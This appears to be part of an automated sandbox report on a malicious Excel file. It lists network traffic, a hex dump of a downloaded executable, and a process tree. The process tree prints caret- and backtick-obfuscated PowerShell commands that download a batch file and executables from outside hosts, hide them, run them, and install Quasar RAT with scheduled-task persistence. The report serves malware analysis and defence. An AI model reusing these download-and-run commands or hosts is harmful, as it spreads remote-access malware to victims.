b3 d1 a5 a9 de 96 fc 7d 62 5a d9 e4 2e 50 0c 26 35 53 97 15 cc e0 d1 cc ba a4 a2 bf 66 64 d0 7c bc ee 95 8f b1 2c 80 15 b5 f9 91 9e f6 11 d2 9a 58 4d 91 9e 88 a7 12 5c cc 38 5a 6c 6f 31 e7 6e bb b3 a3
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELd_0n @ @S H.textt `.rsrc@@.reloc@BPH=0PpWD^S\`]4_xv?)0o8U_`IP+}KgCLFb_<yKFa!fO[_?`gvl0F(3_h47W_"7dnDB;}i/CO:\S7}g@FJ`6!P~,)gFOwr7yEQQA#!(MP.'b\\Sh\$qPoVb:'!Snq>,gxM``SROZwp@) R/Ea=`t}h}bZ.P&5Sfd|,XM\8Zlo1n


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.2249179208.95.112.180C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 6, 2021 09:59:14.545986891 CET5662OUTGET /json/ HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Jan 6, 2021 09:59:14.600667953 CET5663INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:59:14 GMT
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Content-Length: 281
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 37 34 22 7d
                                                                          Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.74"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.2249191195.191.149.10380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 6, 2021 09:59:52.986964941 CET5722OUTGET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: gtp.bg
                                                                          Connection: Keep-Alive
                                                                          Jan 6, 2021 09:59:53.060939074 CET5726INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:59:54 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, Keep-Alive
                                                                          Last-Modified: Tue, 05 Jan 2021 13:10:58 GMT
                                                                          ETag: "53b28b5-db800-5b826effab56e"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 899072
                                                                          Keep-Alive: timeout=3, max=100
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e 2c 67 a2 db 19 dc 78 9e 90 4d 60 60 e8 11 dd 53 bb 13 0d da 91 cd 52 b9 4f d1 93 ae 5a 77 70 40 29 a0 91 a0 e0 ea f0 20 52 ab ac d6 c3 c8 2f 45 61 3d e9 bd 92 60 74 b6 7d 68 b3 d1 a5 a9 de 96 fc 7d 62 5a d9 e4 2e 50 0c 26 35 53 97 15 cc e0 d1 cc ba a4 a2 bf 66 64 d0 7c bc ee 95 8f b1 2c 80 15 b5 f9 91 9e f6 11 d2 9a 58 4d 91 9e 88 a7 12 5c cc 38 5a 6c 6f 31 e7 6e bb b3 a3
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELd_0n @ @S H.textt `.rsrc@@.reloc@BPH=0PpWD^S\`]4_xv?)0o8U_`IP+}KgCLFb_<yKFa!fO[_?`gvl0F(3_h47W_"7dnDB;}i/CO:\S7}g@FJ`6!P~,)gFOwr7yEQQA#!(MP.'b\\Sh\$qPoVb:'!Snq>,gxM``SROZwp@) R/Ea=`t}h}bZ.P&5Sfd|,XM\8Zlo1n


                                                                          HTTPS Packets

                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                          Jan 6, 2021 09:57:47.900882959 CET172.67.8.238443192.168.2.2249167CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                          CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: EXCEL.EXE PID: 1100 Parent PID: 584

                                                                          General

                                                                          Start time:09:57:39
                                                                          Start date:06/01/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                          Imagebase:0x13fdd0000
                                                                          File size:27641504 bytes
                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: cmd.exe PID: 2384 Parent PID: 1100

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 2356 Parent PID: 1100

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 2320 Parent PID: 1100

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: powershell.exe PID: 2864 Parent PID: 2384

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Analysis Process: cmd.exe PID: 1960 Parent PID: 1100

                                                                          General

                                                                          Start time:09:57:42
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: powershell.exe PID: 2928 Parent PID: 2356

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Analysis Process: cmd.exe PID: 960 Parent PID: 1100

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: powershell.exe PID: 2908 Parent PID: 2320

                                                                          General

                                                                          Start time:09:57:43
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Analysis Process: powershell.exe PID: 2464 Parent PID: 1960

                                                                          General

                                                                          Start time:09:57:44
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Analysis Process: powershell.exe PID: 2852 Parent PID: 960

                                                                          General

                                                                          Start time:09:57:44
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          Reputation:high

                                                                          Analysis Process: attrib.exe PID: 2236 Parent PID: 2908

                                                                          General

                                                                          Start time:09:57:47
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\attrib.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                                          Imagebase:0xffd90000
                                                                          File size:18432 bytes
                                                                          MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 1252 Parent PID: 2464

                                                                          General

                                                                          Start time:09:57:53
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: mode.com PID: 2152 Parent PID: 1252

                                                                          General

                                                                          Start time:09:57:53
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\mode.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:mode 18,1
                                                                          Imagebase:0xff640000
                                                                          File size:30208 bytes
                                                                          MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 2196 Parent PID: 1252

                                                                          General

                                                                          Start time:09:57:54
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 2232 Parent PID: 1252

                                                                          General

                                                                          Start time:09:57:54
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
                                                                          Imagebase:0x4a150000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: powershell.exe PID: 1684 Parent PID: 2232

                                                                          General

                                                                          Start time:09:57:54
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
                                                                          Imagebase:0x13f990000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET

                                                                          Analysis Process: sp.exe PID: 1068 Parent PID: 1684

                                                                          General

                                                                          Start time:09:58:01
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Roaming\sp.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\AppData\Roaming\sp.exe'
                                                                          Imagebase:0xbb0000
                                                                          File size:4384256 bytes
                                                                          MD5 hash:E79F542FB3F5AA6E4400953BE24780DB
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, Author: Joe Security

                                                                          Analysis Process: schtasks.exe PID: 912 Parent PID: 1068

                                                                          General

                                                                          Start time:09:58:35
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
                                                                          Imagebase:0xfe0000
                                                                          File size:179712 bytes
                                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: sp.exe PID: 2492 Parent PID: 1068

                                                                          General

                                                                          Start time:09:58:36
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Roaming\sp.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:{path}
                                                                          Imagebase:0xbb0000
                                                                          File size:4384256 bytes
                                                                          MD5 hash:E79F542FB3F5AA6E4400953BE24780DB
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: sp.exe PID: 552 Parent PID: 1068

                                                                          General

                                                                          Start time:09:58:37
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Roaming\sp.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xbb0000
                                                                          File size:4384256 bytes
                                                                          MD5 hash:E79F542FB3F5AA6E4400953BE24780DB
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: eyBLwzbrUF1mwXoy.exe PID: 660 Parent PID: 552

                                                                          General

                                                                          Start time:09:59:03
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
                                                                          Imagebase:0xb0000
                                                                          File size:899072 bytes
                                                                          MD5 hash:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 19%, Metadefender, Browse
                                                                          • Detection: 30%, ReversingLabs

                                                                          Analysis Process: schtasks.exe PID: 1784 Parent PID: 660

                                                                          General

                                                                          Start time:09:59:08
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
                                                                          Imagebase:0x3d0000
                                                                          File size:179712 bytes
                                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: eyBLwzbrUF1mwXoy.exe PID: 2940 Parent PID: 660

                                                                          General

                                                                          Start time:09:59:09
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:{path}
                                                                          Imagebase:0xb0000
                                                                          File size:899072 bytes
                                                                          MD5 hash:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Analysis Process: eyBLwzbrUF1mwXoy.exe PID: 3052 Parent PID: 660

                                                                          General

                                                                          Start time:09:59:09
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xb0000
                                                                          File size:899072 bytes
                                                                          MD5 hash:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                          Analysis Process: ars4t7gFPGrepVgh.exe PID: 2136 Parent PID: 552

                                                                          General

                                                                          Start time:09:59:52
                                                                          Start date:06/01/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
                                                                          Imagebase:0x230000
                                                                          File size:899072 bytes
                                                                          MD5 hash:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 19%, Metadefender, Browse
                                                                          • Detection: 30%, ReversingLabs

                                                                          Analysis Process: schtasks.exe PID: 2932 Parent PID: 2136

                                                                          General

                                                                          Start time:09:59:56
                                                                          Start date:06/01/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
                                                                          Imagebase:0x120000
                                                                          File size:179712 bytes
                                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

